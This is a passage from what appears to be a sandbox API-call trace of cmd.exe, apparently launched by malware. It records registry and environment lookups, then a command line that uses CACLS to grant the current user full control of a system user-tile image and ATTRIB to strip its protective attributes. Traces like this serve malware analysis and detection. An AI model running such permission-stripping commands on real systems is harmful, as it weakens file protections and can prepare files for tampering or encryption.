phkResult=0x2ee6b4*=0x40) returned 0x0 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0xb8, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x0, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegCloseKey (hKey=0x40) returned 0x0 [0186.517] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6b4 | out: phkResult=0x2ee6b4*=0x40) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x0, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x9, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x9, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x9, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegCloseKey (hKey=0x40) returned 0x0 [0186.517] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0186.517] srand (_Seed=0x5b886394) [0186.517] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"" [0186.517] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"" [0186.517] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.518] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.518] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.518] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.518] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.518] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.518] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.518] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.518] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.518] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.518] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.518] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.518] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.518] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.518] GetEnvironmentStringsW () returned 0x4e2458* [0186.518] FreeEnvironmentStringsW (penv=0x4e2458) returned 1 [0186.518] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.518] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.518] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.518] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.518] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.518] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.518] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.518] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.519] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.519] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.519] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.519] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef480, lpFilePart=0x2ef47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef47c*="Desktop") returned 0x18 [0186.519] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.519] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef1fc | out: lpFindFileData=0x2ef1fc) returned 0x4e0ae8 [0186.519] FindClose (in: hFindFile=0x4e0ae8 | out: hFindFile=0x4e0ae8) returned 1 [0186.519] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef1fc | out: lpFindFileData=0x2ef1fc) returned 0x4e0ae8 [0186.519] FindClose (in: hFindFile=0x4e0ae8 | out: hFindFile=0x4e0ae8) returned 1 [0186.519] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef1fc | out: lpFindFileData=0x2ef1fc) returned 0x4e0ae8 [0186.519] FindClose (in: hFindFile=0x4e0ae8 | out: hFindFile=0x4e0ae8) returned 1 [0186.519] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.520] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.520] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.520] GetEnvironmentStringsW () returned 0x4e0308* [0186.520] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.520] GetConsoleOutputCP () returned 0x1b5 [0186.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.520] GetUserDefaultLCID () returned 0x409 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef5c0, cchData=128 | out: lpLCData="0") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef5c0, cchData=128 | out: lpLCData="0") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef5c0, cchData=128 | out: lpLCData="1") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0186.521] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.522] GetConsoleTitleW (in: lpConsoleTitle=0x4d09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.522] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.522] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.522] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.522] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.523] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.523] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.523] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.523] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.523] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.523] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.524] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.524] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.526] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.526] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.526] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.526] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.526] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.526] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0186.526] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.528] GetConsoleTitleW (in: lpConsoleTitle=0x2ef254, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.529] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.529] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.529] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.529] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.529] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.529] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.529] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.529] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.529] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.529] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.529] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.529] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.529] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.529] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.529] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.529] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.529] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.529] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.529] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.529] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.529] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.529] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.529] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.529] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.529] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.529] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.529] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.529] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.530] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.530] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.530] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.530] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.530] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.530] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.530] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.530] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.530] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.530] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.530] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.530] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.530] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.530] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.530] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.530] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.530] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.530] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.530] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.530] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.530] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.530] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.531] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.531] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.531] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.531] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.531] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.531] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.531] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.531] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.531] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.531] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.531] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.531] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.531] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.531] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.531] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0186.531] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.531] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.531] SetErrorMode (uMode=0x0) returned 0x0 [0186.531] SetErrorMode (uMode=0x1) returned 0x0 [0186.531] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e1e98, lpFilePart=0x2eed74 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2eed74*="Desktop") returned 0x18 [0186.531] SetErrorMode (uMode=0x0) returned 0x1 [0186.532] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.532] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.536] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.537] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.538] GetLastError () returned 0x2 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.538] GetLastError () returned 0x2 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4e2180 [0186.538] FindClose (in: hFindFile=0x4e2180 | out: hFindFile=0x4e2180) returned 1 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.538] GetLastError () returned 0x2 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4e2180 [0186.539] FindClose (in: hFindFile=0x4e2180 | out: hFindFile=0x4e2180) returned 1 [0186.539] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.539] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.539] GetConsoleTitleW (in: lpConsoleTitle=0x2eefe8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.539] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eee70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eef38 | out: lpAttributeList=0x2eee70, lpSize=0x2eef38) returned 1 [0186.539] UpdateProcThreadAttribute (in: lpAttributeList=0x2eee70, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eef30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eee70, lpPreviousValue=0x0) returned 1 [0186.539] GetStartupInfoW (in: lpStartupInfo=0x2eee2c | out: lpStartupInfo=0x2eee2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.539] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.540] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2eeecc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eef18 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2eef18*(hProcess=0x50, hThread=0x4c, dwProcessId=0xeb8, dwThreadId=0xebc)) returned 1 [0186.542] CloseHandle (hObject=0x4c) returned 1 [0186.542] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.542] GetEnvironmentStringsW () returned 0x4e0308* [0186.542] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.542] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.610] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2eee0c | out: lpExitCode=0x2eee0c*=0x0) returned 1 [0186.610] CloseHandle (hObject=0x50) returned 1 [0186.610] _vsnwprintf (in: _Buffer=0x2eef54, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eee18 | out: _Buffer="00000000") returned 8 [0186.610] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.610] GetEnvironmentStringsW () returned 0x4e2410* [0186.611] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.611] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.611] GetEnvironmentStringsW () returned 0x4e2410* [0186.611] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.611] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eee70 | out: lpAttributeList=0x2eee70) [0186.611] GetConsoleTitleW (in: lpConsoleTitle=0x2ef254, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.611] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.611] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.611] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.611] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.612] GetLastError () returned 0x2 [0186.612] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.612] GetLastError () returned 0x2 [0186.612] FindFirstFileExW (in: 